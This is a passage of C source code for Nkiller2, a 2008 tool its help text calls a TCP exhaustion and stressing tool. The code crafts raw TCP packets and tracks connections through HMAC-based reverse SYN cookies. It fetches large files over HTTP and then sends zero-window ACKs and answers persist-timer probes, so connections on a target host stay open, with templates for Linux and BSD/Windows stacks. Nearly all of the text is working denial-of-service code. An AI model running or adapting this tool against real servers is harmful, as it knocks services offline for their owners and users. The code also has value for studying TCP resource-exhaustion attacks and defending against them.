#endif


#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>   /* gettimeofday() */

#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>

#include <openssl/hmac.h>

#include <errno.h>
#include <pcap.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sysexits.h>
#include <time.h>
#include <unistd.h>
#include <getopt.h>


#define DEFAULT_KEY             "Nkiller31337"
#define DEFAULT_NUM_PROBES      100000
#define DEFAULT_PROBES_RND      100
#define DEFAULT_POLLTIME        100
#define DEFAULT_SLEEP_TIME      100
#define DEFAULT_PROBE_INTERVAL  150

#define WEB_PAYLOAD     "GET / HTTP/1.0\015\012\015\012"

/* Timeval subtraction in microseconds */
#define TIMEVAL_SUBTRACT(a, b) \
  (((a).tv_sec - (b).tv_sec) * 1000000L + (a).tv_usec - (b).tv_usec)

/*
 * Pseudo-header used for checksumming; this header should never
 * reach the wire
 */
typedef struct pseudo_hdr {
  uint32_t src;
  uint32_t dst;
  unsigned char mbz;
  unsigned char proto;
  uint16_t len;
} pseudo_hdr;


/*
 * TCP timestamp struct 
 */
typedef struct tcp_timestamp {
  char kind;
  char length;
  uint32_t tsval __attribute__((__packed__));
  uint32_t tsecr __attribute__((__packed__));
  char padding[2];
} tcp_timestamp;

/*
 * TCP Maximum Segment Size
 */
typedef struct tcp_mss {
  char kind;
  char length;
  uint16_t mss __attribute__((__packed__));
} tcp_mss;


/* Network stack templates */
enum {
  T_LINUX,
  T_BSDWIN
};

/* Possible replies */
enum {
  S_ERR,      /* no reply, RST, invalid packet etc */
  S_SYNACK,   /* 2nd part of initial handshake */
  S_FDACK,    /* first data ack - in reply to our first data */
  S_DATA_0,   /* first data packet */
  S_DATA_1,   /* second data packet */
  S_PROBE     /* persist timer probe */
};

/*
 * Ethernet header stuff.
 */
#define ETHER_ADDR_LEN  6
#define SIZE_ETHERNET   14
typedef struct ethernet {
  u_char ether_dhost[ETHER_ADDR_LEN]; /* Destination host address */
  u_char ether_shost[ETHER_ADDR_LEN]; /* Source host address */
  u_short ether_type;                 /* Frame type */
} ether_hdr;


/*
 * Global nkiller options struct
 */
typedef struct Options {
  char target[16];
  char skey[32];
  char payload[256];
  char path[256];         /* relative to virtual-host/ip path */
  char vhost[256];        /* virtual host name */
  uint16_t *portlist;
  unsigned int probe_interval; /* interval for our persist probe reply */
  unsigned int probes;    /* total number of fully-connected probes */
  unsigned int probes_per_rnd; /* number of probes per round */
  unsigned int polltime;  /* how many microseconds to poll pcap */
  unsigned int sleep;     /* sleep time between each probe */
  int template;           /* victim network stack template */
  int dynamic;            /* remove ports from list when we get RST */
  int guardmode;          /* continue answering to zero probes */
  int verbose;
  int debug;              /* some debugging info */
  int debug2;             /* all debugging info */
} Options;


/*
 * Port list types
 */
typedef struct port_elem {
  uint16_t port_val;
  struct port_elem *next;
} port_elem;

typedef struct port_list {
  port_elem *first;
  port_elem *last;
} port_list;

/*
 * Host information
 */
typedef struct HostInfo {
  struct in_addr daddr; /* target ip address */
  char *payload;
  char *url;
  char *vhost;
  size_t plen;            /* payload length */
  size_t wlen;            /* http request length */
  port_list ports;        /* linked list of ports */
  unsigned int portlen;   /* how many ports */
} HostInfo;


typedef struct SniffInfo {
  struct in_addr saddr;   /* local ip */
  pcap_if_t *dev;
  pcap_t *pd;
} SniffInfo;


typedef struct Sock {
  struct in_addr saddr;
  struct in_addr daddr;
  uint16_t sport;
  uint16_t dport;
} Sock;


/* global vars */
Options o;


/**** function declarations ****/

/* helper functions */
static void fatal(const char *fmt, ...);
static void usage(void);
static void help(void);
static void *xcalloc(size_t nelem, size_t size);
static void *xmalloc(size_t size);
static void *xrealloc(void *ptr, size_t size);

/* port-handling functions */
static void port_add(HostInfo *Target, uint16_t port);
static void port_remove(HostInfo *Target, uint16_t port);
static int port_exists(HostInfo *Target, uint16_t port);
static uint16_t port_get_random(HostInfo *Target);
static uint16_t *port_parse(char *portarg, unsigned int *portlen);

/* packet helper functions */
static uint16_t checksum_comp(uint16_t *addr, int len);
static void handle_payloads(HostInfo *Target);
static uint32_t calc_cookie(Sock *sockinfo);
static char *build_mss(char **tcpopt, unsigned int *tcpopt_len,
    uint16_t mss);
static int get_timestamp(const struct tcphdr *tcp, uint32_t *tsval,
    uint32_t *tsecr);
static char *build_timestamp(char **tcpopt, unsigned int *tcpopt_len,
    uint32_t tsval, uint32_t tsecr);

/* sniffing functions */
static void sniffer_init(HostInfo *Target, SniffInfo *Sniffer);
static int check_replies(HostInfo *Target, SniffInfo *Sniffer, 
    u_char **reply);

/* packet handling functions */
static void send_packet(char* packet, unsigned int *packetlen);
static void send_syn_probe(HostInfo *Target, SniffInfo *Sniffer);
static int send_probe(const u_char *reply, HostInfo *Target, int state);
static char *build_tcpip_packet(const struct in_addr *source,
    const struct in_addr *target, uint16_t sport, uint16_t dport,
    uint32_t seq, uint32_t ack, uint8_t ttl, uint16_t ipid,
    uint16_t window, uint8_t flags, char *data, uint16_t datalen,
    char *tcpopt, unsigned int tcpopt_len, unsigned int *packetlen);


/**** function definitions ****/


/*
 * Wrapper around calloc() that calls fatal when out of memory
 */
static void *
xcalloc(size_t nelem, size_t size)
{
  void *p;

  p = calloc(nelem, size);
  if (p == NULL)
    fatal("Out of memory\n");
  return p;
}


/*
 * Wrapper around xcalloc() that calls fatal() when out of memory
 */
static void *
xmalloc(size_t size)
{
  return xcalloc(1, size);
}


static void *
xrealloc(void *ptr, size_t size)
{
  void *p;

  p = realloc(ptr, size);
  if (p == NULL)
    fatal("Out of memory\n");
  return p;
}


/*
 * vararg function called when sth _evil_ happens
 * usually in conjunction with __func__ to note
 * which function caused the RIP stat
 */
static void
fatal(const char *fmt, ...)
{
  va_list ap;
  va_start(ap, fmt);
  (void) vfprintf(stderr, fmt, ap);
  va_end(ap);
  exit(EXIT_FAILURE);
}


/* Return network stack template */
static const char *
get_template(int template)
{
  switch (template) {
    case T_LINUX:
      return("Linux");
    case T_BSDWIN:
      return("BSD | Windows");
    default:
      return("Unknown");
  }
}


/*
 * Print a short usage summary and exit
 */
static void
usage(void)
{
  fprintf(stderr,
      "nkiller2 [-t addr] [-p ports] [-k key] [-n total probes]\n"
      "         [-N probes/rnd] [-c msec] [-l payload] [-w path]\n"
      "         [-s sleep] [-d level] [-r vhost] [-T template]\n"
      "         [-P probe-interval] [-hvyg]\n"
      "Please use `-h' for detailed help.\n");
  exit(EX_USAGE);
}


/*
 * Print detailed help
 */
static void
help(void)
{
  static const char *help_message =
    "Nkiller2 - a TCP exhaustion & stressing tool\n"
    "\n"
    "Copyright (c) 2008 ithilgore <ithilgore.ryu.L@gmail.com>\n"
    "http://sock-raw.org\n"
    "\n"
    "Nkiller is free software, covered by the GNU General Public License,"
    "\nand you are welcome to change it and/or distribute copies of it "
    "under\ncertain conditions.  See the file `COPYING' in the source\n"
    "distribution of nkiller for the conditions and terms that it is\n"
    "distributed under.\n"
    "\n"
    "    WARNING:\n"
    "The authors disclaim any express or implied warranties, including,\n"
    "but not limited to, the implied warranties of merchantability and\n"
    "fitness for any particular purpose. In no event shall the authors "
    "or\ncontributors be liable for any direct, indirect, incidental, "
    "special,\nexemplary, or consequential damages (including, but not "
    "limited to,\nprocurement of substitute goods or services; loss of "
    "use, data, or\nprofits; or business interruption) however caused and"
    " on any theory\nof liability, whether in contract, strict liability,"
    " or tort\n(including negligence or otherwise) arising in any way out"
    " of the use\nof this software, even if advised of the possibility of"
    " such damage.\n\n"
    "Usage:\n"
    "\n"
    "    nkiller2 -t <target> -p <ports> [options]\n"
    "\n"
    "Mandatory:\n"
    "  -t target          The IP address of the target host.\n"
    "  -p port[,port]     A list of ports, separated by commas. Specify\n"
    "                     only ports that are known to be open, or use\n"
    "                     -y when unsure.\n"
    "Options:\n"
    "  -c msec            Time in microseconds, between each pcap poll\n"
    "                     for packets (pcap poll timeout).\n"
    "  -d level           Set the debug level (1: some, 2: all)\n"
    "  -h                 Print this help message.\n"
    "  -k key             Set the key for reverse SYN cookies.\n"
    "  -l payload         Additional payload string.\n"
    "  -s sleep           Average time in ms between each probe.\n"
    "  -n probes          Set the number of probes, 0 for unlimited.\n"
    "  -N probes/rnd      Number of probes per round.\n"
    "  -T template        Attacked network stack template:\n"
    "                     0. Linux (default)\n"
    "                     1. *BSD | Windows\n"
    "  -P time            Number of seconds after which we reply to the\n"
    "                     persist timer probes.\n"
    "  -w path            URL or GET request to web server. The path of\n"
    "                     a big file (> 4K) should work nicely here.\n"
    "  -r vhost           Virtual host name. This is needed for web\n"
    "                     hosts that support virtual hosting on HTTP1.1\n"
    "  -g                 Guardmode. Continue answering to zero probes \n"
    "                     until the end of times.\n"
    "  -y                 Dynamic port handling.  Remove ports from the\n"
    "                     port list if we get an RST for them. Useful\n"
    "                     when you do not know if one port is open for "
    "sure.\n"
    "  -v                 Verbose mode.\n";

  printf("%s", help_message);
  fflush(stdout);
}


/*
 * Build a TCP packet from its constituents
 */
static char *
build_tcpip_packet(const struct in_addr *source,
    const struct in_addr *target, uint16_t sport, uint16_t dport,
    uint32_t seq, uint32_t ack, uint8_t ttl, uint16_t ipid,
    uint16_t window, uint8_t flags, char *data, uint16_t datalen,
    char *tcpopt, unsigned int tcpopt_len, unsigned int *packetlen)
{
  char *packet;
  struct ip *ip;
  struct tcphdr *tcp;
  pseudo_hdr *phdr;
  char *tcpdata;
  /* fake length to account for 16bit word padding chksum */
  unsigned int chklen;    

  if (tcpopt_len % 4)
    fatal("TCP option length must be divisible by 4.\n");

  *packetlen = sizeof(*ip) + sizeof(*tcp) + tcpopt_len + datalen;
  if (*packetlen % 2)
    chklen = *packetlen + 1;
  else 
    chklen = *packetlen;

  packet = xmalloc(chklen + sizeof(*phdr));

  ip = (struct ip *)packet;
  tcp = (struct tcphdr *) ((char *)ip + sizeof(*ip));
  tcpdata = (char *) ((char *)tcp + sizeof(*tcp) + tcpopt_len);

  memset(packet, 0, chklen);

  ip->ip_v = 4;
  ip->ip_hl = 5;
  ip->ip_tos = 0;
  ip->ip_len = *packetlen; /* must be in host byte order for FreeBSD */
  ip->ip_id = htons(ipid); /* kernel will fill with random value if 0 */
  ip->ip_off = 0;
  ip->ip_ttl = ttl;
  ip->ip_p = IPPROTO_TCP;
  ip->ip_sum = checksum_comp((unsigned short *)ip, sizeof(struct ip));
  ip->ip_src.s_addr = source->s_addr;
  ip->ip_dst.s_addr = target->s_addr;

  tcp->th_sport = htons(sport);
  tcp->th_dport = htons(dport);
  tcp->th_seq = seq;
  tcp->th_ack = ack;
  tcp->th_x2 = 0;
  tcp->th_off = 5 + (tcpopt_len / 4);
  tcp->th_flags = flags;
  tcp->th_win = htons(window);
  tcp->th_urp = 0;

  memcpy((char *)tcp + sizeof(*tcp), tcpopt, tcpopt_len);
  memcpy(tcpdata, data, datalen);

  /* pseudo header used for checksumming */
  phdr = (struct pseudo_hdr *) ((char *)packet + chklen);
  phdr->src = source->s_addr;
  phdr->dst = target->s_addr;
  phdr->mbz = 0;
  phdr->proto = IPPROTO_TCP;
  phdr->len = htons((tcp->th_off * 4) + datalen);
  /* tcp checksum */
  tcp->th_sum = checksum_comp((unsigned short *)tcp,
      chklen - sizeof(*ip) + sizeof(*phdr));

  return packet;
}


/* 
 * Write the packet to the network and free it from memory
 */
static void
send_packet(char* packet, unsigned int *packetlen)
{
  struct sockaddr_in sin;
  int sockfd, one;

  memset(&sin, 0, sizeof(sin));
  sin.sin_family = AF_INET;
  sin.sin_port = ((struct tcphdr *)(packet + 
        sizeof(struct ip)))->th_dport;
  sin.sin_addr.s_addr = ((struct ip *)(packet))->ip_dst.s_addr;

  if ((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    fatal("cannot open socket: %s\n", strerror(errno));

  /* we supply the IP header ourselves */
  one = 1;
  if (setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, (const char *) &one,
        sizeof(one)) < 0)
    fatal("setsockopt(IP_HDRINCL): %s\n", strerror(errno));

  if (sendto(sockfd, packet, *packetlen, 0,
        (struct sockaddr *)&sin, sizeof(sin)) < 0) {
    fatal("sendto error: %s\n", strerror(errno));
  }
  close(sockfd);
  free(packet);
}


/*
 * Build TCP timestamp option
 * tcpopt points to possibly already existing TCP options
 * so inspect current TCP option length (tcpopt_len)
 */
static char *
build_timestamp(char **tcpopt, unsigned int *tcpopt_len,
    uint32_t tsval, uint32_t tsecr) 
{
  struct timeval now;
  tcp_timestamp t;
  char *opt;

  if (*tcpopt_len) {
    opt = xrealloc(*tcpopt, *tcpopt_len + sizeof(t));
    *tcpopt = opt;
    opt += *tcpopt_len;
  } else
    *tcpopt = xmalloc(sizeof(t));

  memset(&t, TCPOPT_NOP, sizeof(t));
  t.kind = TCPOPT_TIMESTAMP;
  t.length = 10;
  if (gettimeofday(&now, NULL) < 0)
    fatal("Couldn't get time of day\n");
  t.tsval = htonl((tsval) ? tsval : (uint32_t)now.tv_sec);
  t.tsecr = htonl((tsecr) ? tsecr : 0);

  if (*tcpopt_len)
    memcpy(opt, &t, sizeof(t));
  else 
    memcpy(*tcpopt, &t, sizeof(t));

  *tcpopt_len += sizeof(t);

  return *tcpopt;
}


/*
 * Build TCP Maximum Segment Size option
 */
static char *
build_mss(char **tcpopt, unsigned int *tcpopt_len, uint16_t mss)
{
  struct tcp_mss t;
  char *opt;

  if (*tcpopt_len) {
    opt = xrealloc(*tcpopt, *tcpopt_len + sizeof(t));
    *tcpopt = opt;
    opt += *tcpopt_len;
  } else
    *tcpopt = xmalloc(sizeof(t));

  memset(&t, TCPOPT_NOP, sizeof(t));
  t.kind = TCPOPT_MAXSEG;
  t.length = 4;
  t.mss = htons(mss);

  if (*tcpopt_len)
    memcpy(opt, &t, sizeof(t));
  else 
    memcpy(*tcpopt, &t, sizeof(t));

  *tcpopt_len += sizeof(t);
  return *tcpopt;
}


/* 
 * Perform pcap polling (until a certain timeout) and
 * return the packet you got - also check that the
 * packet we get is something we were expecting, according
 * to the reverse cookie we had set in the tcp seq field.
 * Returns the virtual state that the reply denotes and which
 * we differentiate from each other based on packet parsing techniques.
 */
static int 
check_replies(HostInfo *Target, SniffInfo *Sniffer, u_char **reply)
{

  int timedout = 0;
  int goodone = 0;
  const u_char *packet = NULL;
  uint32_t decoded_seq;
  uint32_t ack, calc_ack;
  int state;
  uint16_t datagram_len;
  uint32_t datalen;
  struct Sock sockinfo;
  struct pcap_pkthdr phead;
  const struct ip *ip;
  const struct tcphdr *tcp;
  struct timeval now, wait;
  uint32_t tsval, tsecr;
  uint32_t time_elapsed = 0;

  state = 0;

  if (gettimeofday(&wait, NULL) < 0)
    fatal("Couldn't get time of day\n");
  /* poll for 'polltime' micro seconds */
  wait.tv_usec += o.polltime;

  do {
    datagram_len = 0;
    packet = pcap_next(Sniffer->pd, &phead);
    if (gettimeofday(&now, NULL) < 0)
      fatal("Couldn't get time of day\n");
    if (TIMEVAL_SUBTRACT(wait, now) < 0)
      timedout++;

    if (packet == NULL)
      continue;

    /* This only works on Ethernet - be warned */
    if (*(packet + 12) != 0x8) {
      break; /* not an IPv4 packet */
    }

    ip = (const struct ip *) (packet + SIZE_ETHERNET);

    /* 
     * TCP/IP header checking - end cases are more than the ones
     * checked below but are so rarely happening that for
     * now we won't go into trouble to validate - could also
     * use validedpkt() from nmap/tcpip.cc
     */
    if (ip->ip_hl < 5) {
      if (o.debug2)
        (void) fprintf(stderr, "IP header < 20 bytes\n");
      break;
    }
    if (ip->ip_p != IPPROTO_TCP) {
      if (o.debug2)
        (void) fprintf(stderr, "Packet not TCP\n");
      break;
    }

    datagram_len = ntohs(ip->ip_len); /* Save length for later */

    tcp = (const void *) ((const char *)ip + ip->ip_hl * 4);
    if (tcp->th_off < 5) {
      if (o.debug2)
        (void) fprintf(stderr, "TCP header < 20 bytes\n");
      break;
    }

    datalen = datagram_len - (ip->ip_hl * 4) - (tcp->th_off * 4);

    /* A non-ACK packet is nothing valid */
    if (!(tcp->th_flags & TH_ACK))
      break; 

    /* 
     * We swap the values accordingly since we want to
     * check the result with the 4tuple we had created
     * when sending our own syn probe
     */
    sockinfo.saddr.s_addr = ip->ip_dst.s_addr;
    sockinfo.daddr.s_addr = ip->ip_src.s_addr;
    sockinfo.sport = ntohs(tcp->th_dport);
    sockinfo.dport = ntohs(tcp->th_sport);
    decoded_seq = calc_cookie(&sockinfo);

    if (tcp->th_flags & (TH_SYN|TH_RST)) {

      ack = ntohl(tcp->th_ack) - 1;
      calc_ack = ntohl(decoded_seq);
      /* 
       * We can't directly compare two values returned by
       * the ntohl functions
       */
      if (ack != calc_ack)
        break;

      /* OK we got a reply to something we have sent */

      /* SYNACK case */
      if (tcp->th_flags & TH_SYN) {

        if (o.dynamic && port_exists(Target, sockinfo.dport)) {
          if (o.debug2)
            (void) fprintf(stderr, "Port doesn't exist in list "
                "- probably removed it before due to an RST and dynamic "
                "handling\n");
          break;
        }
        if (o.debug)
          (void) fprintf(stdout,
              "Got SYN packet with seq: %x our port: %u "
              "target port: %u\n", decoded_seq,
              sockinfo.sport, sockinfo.dport);

        goodone++;
        state = S_SYNACK;

        /* ERR case */
      } else if (tcp->th_flags & TH_RST) {

        /* 
         * If we get an RST packet this means that the port is
         * closed and thus we remove it from our port list.
         */
        if (o.debug2)
          (void) fprintf(stdout,
              "Oops! Got an RST packet with seq: %x "
              "port %u is closed\n",decoded_seq,
              sockinfo.dport);
        if (o.dynamic)
          port_remove(Target, sockinfo.dport);
      } 
    } else {
      /* 
       * Each subsequent ACK that we get will have the
       * same acknowledgment number since we won't be sending
       * any more data to the target.
       */
      ack = ntohl(tcp->th_ack);
      calc_ack = ntohl(decoded_seq) + Target->wlen + 1;

      if (ack != calc_ack) 
        break;

      /* 'now' is the timeval declared at the top of the function */
      if (get_timestamp(tcp, &tsval, &tsecr)) {
        if (gettimeofday(&now, NULL) < 0)
          fatal("Couldn't get time of day\n");
        time_elapsed = now.tv_sec - tsecr;
        if (o.debug) 
          (void) fprintf(stdout, "Time elapsed: %u (sport: %u)\n",
              time_elapsed, sockinfo.sport);
      } else 
        (void) fprintf(stdout, "Warning: No timestamp available from "
            "target host's reply. Chaotic behaviour imminent...\n");

      /* 
       * First Data Acknowledgment case (FDACK)
       * Note that this packet may not always appear, since there
       * is a chance that it will be piggybacked with the first
       * sending data of the peer, depending on whether the delayed
       * acknowledgment timer expired or not at the peer side.
       * Practically, we choose to ignore it and wait until
       * we receive actual data.
       */
      if (ack == calc_ack && (!datalen || datalen == 1)
          && time_elapsed < o.probe_interval) {
        state = S_FDACK;
        break;
      }

      /* 
       * Data - victim sent the first packet(s) of data
       */
      if (ack == calc_ack && datalen > 1) {
        if (tcp->th_flags & TH_PUSH) {
          state = S_DATA_1;
          goodone++;
          break;
        } else {
          state = S_DATA_0;
          goodone++;
          break;
        }
      }

      /* 
       * Persist (Probe) Timer reply
       * The time_elapsed limit must be at least equal to the product:
       * ('persist_timer_interval' * '/proc/sys/net/ipv4/tcp_retries2')
       * or else we might lose an important probe and fail to ack it
       * On Linux: persist_timer_interval = about 2 minutes (after it has
       * stabilized) and tcp_retries2 = 15 probes.
       * Note we check 'datalen' for both 0 and 1 since Linux probes
       * with 0 data, while *BSD/Windows probe with 1 byte of data
       */
      if (ack == calc_ack && (!datalen || datalen == 1) 
          && time_elapsed >= o.probe_interval) {
        state = S_PROBE;
        goodone++;
        break;
      }

    }

  } while (!timedout && !goodone);

  if (goodone) {
    *reply = xmalloc(datagram_len);
    memcpy(*reply, packet + SIZE_ETHERNET, datagram_len);
  }

  return state;
}


/* 
 * Parse TCP options and get timestamp if it exists.
 * Return 1 if timestamp valid, 0 for failure
 */
static int
get_timestamp(const struct tcphdr *tcp, uint32_t *tsval, uint32_t *tsecr)
{
  u_char *p;
  unsigned int op;
  unsigned int oplen;
  unsigned int len = 0;

  if (!tsval || !tsecr)
    return 0;

  p = ((u_char *)tcp) + sizeof(*tcp);
  len = 4 * tcp->th_off - sizeof(*tcp);

  while (len > 0 && *p != TCPOPT_EOL) {
    op = *p++;
    if (op == TCPOPT_EOL)
      break;
    if (op == TCPOPT_NOP) {
      len--;
      continue;
    }
    oplen = *p++;
    if (oplen < 2) 
      break;
    if (oplen > len)
      break; /* not enough space */
    if (op == TCPOPT_TIMESTAMP && oplen == 10) {
      /* legitimate timestamp option */
      if (tsval) { 
        memcpy((char *)tsval, p, 4); 
        *tsval = ntohl(*tsval); 
      }
      p += 4;
      if (tsecr) { 
        memcpy((char *)tsecr, p, 4);
        *tsecr = ntohl(*tsecr);
      }
      return 1;
    }
    len -= oplen;
    p += oplen - 2;
  }
  *tsval = 0;
  *tsecr = 0;
  return 0;
}


/* 
 * Craft SYN initiating probe
 */
static void
send_syn_probe(HostInfo *Target, SniffInfo *Sniffer)
{
  char *packet;
  char *tcpopt;
  uint16_t sport, dport;
  uint32_t encoded_seq;
  unsigned int packetlen, tcpopt_len;
  Sock *sockinfo;

  tcpopt_len = 0;
  sockinfo = xmalloc(sizeof(*sockinfo));

  /* keep the source port in the range 1024-65535 */
  sport = 1024 + (random() % (65536 - 1024));
  dport = port_get_random(Target);

  /* Calculate reverse cookie and encode value into sequence number */
  sockinfo->saddr.s_addr = Sniffer->saddr.s_addr;
  sockinfo->daddr.s_addr = Target->daddr.s_addr;
  sockinfo->sport = sport;
  sockinfo->dport = dport;
  encoded_seq = calc_cookie(sockinfo);

  /* Build tcp options - timestamp, mss */
  tcpopt = build_timestamp(&tcpopt, &tcpopt_len, 0, 0);
  tcpopt = build_mss(&tcpopt, &tcpopt_len, 1024);

  packet = build_tcpip_packet(
      &Sniffer->saddr,
      &Target->daddr,
      sport,
      dport,
      encoded_seq,
      0,
      64,
      random() % (uint16_t)~0,
      1024,
      TH_SYN,
      NULL,
      0,
      tcpopt,
      tcpopt_len,
      &packetlen
      );

  send_packet(packet, &packetlen);

  free(tcpopt);
  free(sockinfo);
}


/* 
 * Generic probe function: depending on the value of 'state' as
 * denoted by check_replies() earlier, we trigger a different probe
 * behaviour, taking also into account any network stack templates.
 */
static int
send_probe(const u_char *reply, HostInfo *Target, int state)
{
  char *packet;
  unsigned int packetlen;
  uint32_t ack;
  char *tcpopt = NULL;    /* stays NULL when no timestamp is built */
  unsigned int tcpopt_len;
  int validstamp;
  uint32_t tsval, tsecr;
  struct ip *ip;
  struct tcphdr *tcp;
  uint16_t datalen;
  uint16_t window;
  int payload = 0;

  validstamp = 0;
  tcpopt_len = 0;

  ip = (struct ip *)reply;
  tcp = (struct tcphdr *)((char *)ip + ip->ip_hl * 4);
  datalen = ntohs(ip->ip_len) - (ip->ip_hl * 4) - (tcp->th_off * 4);

  switch (state) {
    case S_SYNACK:
      ack = ntohl(tcp->th_seq) + 1;
      window = 1024;
      payload++;
      break;
    case S_DATA_0:
      ack = ntohl(tcp->th_seq) + datalen;
      if (o.template == T_BSDWIN) 
        window = 0;
      else 
        window = 512;
      break;
    case S_DATA_1:
      ack = ntohl(tcp->th_seq) + datalen;
      window = 0;
      break;
    case S_PROBE:
      ack = ntohl(tcp->th_seq);
      window = 0;
      break;
    default:    /* we shouldn't get here */
      ack = ntohl(tcp->th_seq);
      window = 0;
      break;
  }

  if (get_timestamp(tcp, &tsval, &tsecr)) {
    validstamp++;
    tcpopt = build_timestamp(&tcpopt, &tcpopt_len, 0, tsval);
  }

  packet = build_tcpip_packet(
      &ip->ip_dst,  /* mind the swapping */
      &ip->ip_src,
      ntohs(tcp->th_dport),
      ntohs(tcp->th_sport),
      tcp->th_ack, /* as seq field */
      htonl(ack),
      64,
      random() % (uint16_t)~0,
      window,
      TH_ACK,
      (payload) ? ((ntohs(tcp->th_sport) == 80) 
        ? Target->url : Target->payload) : NULL,
      (payload) ? ((ntohs(tcp->th_sport) == 80) 
        ? Target->wlen : Target->plen) : 0,
      (validstamp) ? tcpopt : NULL,
      (validstamp) ? tcpopt_len : 0,
      &packetlen
      );

  send_packet(packet, &packetlen);
  free(tcpopt);

  return 0;
}


/* 
 * Reverse(or client) syn_cookie function - encode the 4tuple
 * { src ip, src port, dst ip, dst port } and a secret key into 
 * the sequence number, thus keeping info of the packet inside itself
 * (idea taken by scanrand - Nmap uses an equivalent technique too)
 */
static uint32_t
calc_cookie(Sock *sockinfo)
{

  uint32_t seq;
  unsigned int cookie_len;
  unsigned int input_len;
  unsigned char *input;
  unsigned char cookie[EVP_MAX_MD_SIZE];

  input_len = sizeof(*sockinfo);
  input = xmalloc(input_len);
  memcpy(input, sockinfo, sizeof(*sockinfo));

  /* Calculate a sha1 hash based on the quadruple and the skey */
  HMAC(EVP_sha1(), (char *)o.skey, strlen(o.skey), input, input_len,
      cookie, &cookie_len);

  free(input);

  /* Get only the first 32 bits of the sha1 hash */
  memcpy(&seq, &cookie, sizeof(seq));
  return seq;
}


static void
sniffer_init(HostInfo *Target, SniffInfo *Sniffer)
{
  char errbuf[PCAP_ERRBUF_SIZE];
  struct bpf_program bpf;
  struct pcap_addr *address;
  struct sockaddr_in *ip;
  char filter[27];

  strncpy(filter, "src host ", sizeof(filter));
  strncpy(&filter[sizeof("src host ")-1], inet_ntoa(Target->daddr), 16);
  if (o.debug)
    (void) fprintf(stdout, "Filter: %s\n", filter);

  if ((pcap_findalldevs(&Sniffer->dev, errbuf)) == -1)
    fatal("%s: pcap_findalldevs(): %s\n", __func__, errbuf);

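  if (Sniffer->dev == NULL)
    fatal("%s: no capture device found\n", __func__);

  /* 
   * Pick the first IPv4 address of the device; other entries
   * (e.g. link-layer ones) are of no use to us.
   */
  for (address = Sniffer->dev->addresses; address != NULL;
      address = address->next) {
    if (address->addr && address->addr->sa_family == AF_INET)
      break;
  }

  if (address != NULL) {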
    ip = (struct sockaddr_in *) address->addr;
    memcpy(&Sniffer->saddr, &ip->sin_addr, sizeof(struct in_addr));
    if (o.debug) {
      (void) fprintf(stdout, "Local IP: %s\nDevice name: "
          "%s\n", inet_ntoa(Sniffer->saddr), Sniffer->dev->name);
    }
  } else
    fatal("%s: Couldn't find associated IP with interface %s\n",
        __func__, Sniffer->dev->name);

  if (!(Sniffer->pd = 
        pcap_open_live(Sniffer->dev->name, BUFSIZ, 0, 0, errbuf)))
    fatal("%s: Could not open device %s: error: %s\n ", __func__,
        Sniffer->dev->name, errbuf);

  if (pcap_compile(Sniffer->pd , &bpf, filter, 0, 0) == -1)
    fatal("%s: Couldn't parse filter %s: %s\n ", __func__, filter,
        pcap_geterr(Sniffer->pd));

  if (pcap_setfilter(Sniffer->pd, &bpf) == -1)
    fatal("%s: Couldn't install filter %s: %s\n", __func__, filter,
        pcap_geterr(Sniffer->pd));

  if (pcap_setnonblock(Sniffer->pd, 1, errbuf) < 0)
    fprintf(stderr, "Couldn't set nonblocking mode: %s\n", errbuf);
}


static uint16_t *
port_parse(char *portarg, unsigned int *portlen)
{
  char *endp;
  uint16_t *ports;
  unsigned int nports;
  unsigned long pvalue;
  char *temp;
  if (portlen != NULL)
    *portlen = 0;

  ports = xmalloc(65535 * sizeof(uint16_t));
  nports = 0;

  while (nports < 65535) {
    if (nports == 0)
      temp = strtok(portarg, ",");
    else
      temp = strtok(NULL, ",");

    if (temp == NULL)
      break;

    endp = NULL;
    errno = 0;
    pvalue = strtoul(temp, &endp, 0);
    if (errno != 0 || *endp != '\0') {
      fprintf(stderr, "Invalid port number: %s\n",
          temp);
      goto cleanup;
    }

    if (pvalue > IPPORT_MAX) {
      fprintf(stderr, "Port number too large: %s\n",
          temp);
      goto cleanup;
    }

    ports[nports++] = (uint16_t)pvalue;
  }
  if (portlen != NULL)
    *portlen = nports;
  return ports;

cleanup:
  free(ports);
  return NULL;
}


/*
 * Check if port is in list, return 0 if it is, -1 if not
 * (similar to port_remove in logic)
 */
static int
port_exists(HostInfo *Target, uint16_t port)
{
  port_elem *current;

  current = Target->ports.first;

  while (current->port_val != port && current->next != NULL)
    current = current->next;

  if (current->port_val != port && current->next == NULL) {
    if (o.debug2)
      (void) fprintf(stderr, "%s: port %u doesn't exist in "
          "list\n", __func__, port);
    return -1;
  } else
    return 0;
}


/* 
 * Remove specific port from portlist
 */
static void
port_remove(HostInfo *Target, uint16_t port)
{
  port_elem *current;
  port_elem *before;

  current = Target->ports.first;
  before = Target->ports.first;

  while (current->port_val != port && current->next != NULL) {
    before = current;
    current = current->next;
  }

  if (current->port_val != port) {
    /* walked the whole list without a match */
    if (o.debug2)
      (void) fprintf(stderr, "Port %u not found in list\n", port);
    return;
  }

  if (current != Target->ports.first) {
    before->next = current->next;
  } else {
    Target->ports.first = current->next;
  }
  /* keep the tail pointer valid, port_add() appends through it */
  if (current == Target->ports.last)
    Target->ports.last = (current == before) ? NULL : before;
  free(current);
  Target->portlen--;
  if (!Target->portlen)
    fatal("No port left to hit!\n");
}


/*
 * Add new port to port linked list of Target
 */
static void
port_add(HostInfo *Target, uint16_t port)
{
  port_elem *current;
  port_elem *newNode;

  newNode = xmalloc(sizeof(*newNode));

  newNode->port_val = port;
  newNode->next = NULL;

  if (Target->ports.first == NULL) {
    Target->ports.first = newNode;
    Target->ports.last = newNode;
    return;
  }

  current = Target->ports.last;
  current->next = newNode;
  Target->ports.last = newNode;
}


/* 
 * Return a random port from portlist
 */
static uint16_t
port_get_random(HostInfo *Target)
{
  port_elem *temp;
  unsigned int i, offset;

  temp = Target->ports.first;
  offset = (random() % Target->portlen);
  i = 0;
  while (i < offset) {
    temp = temp->next;
    i++;
  }
  return temp->port_val;
}


/*
 * Prepare the payload that will be sent in the 3rd phase
 * of the connection-establishment handshake (piggybacked
 * along with the ACK of the peer's SYNACK)
 */
static void
handle_payloads(HostInfo *Target)
{
  if (o.payload[0]) {
    Target->plen = strlen(o.payload);
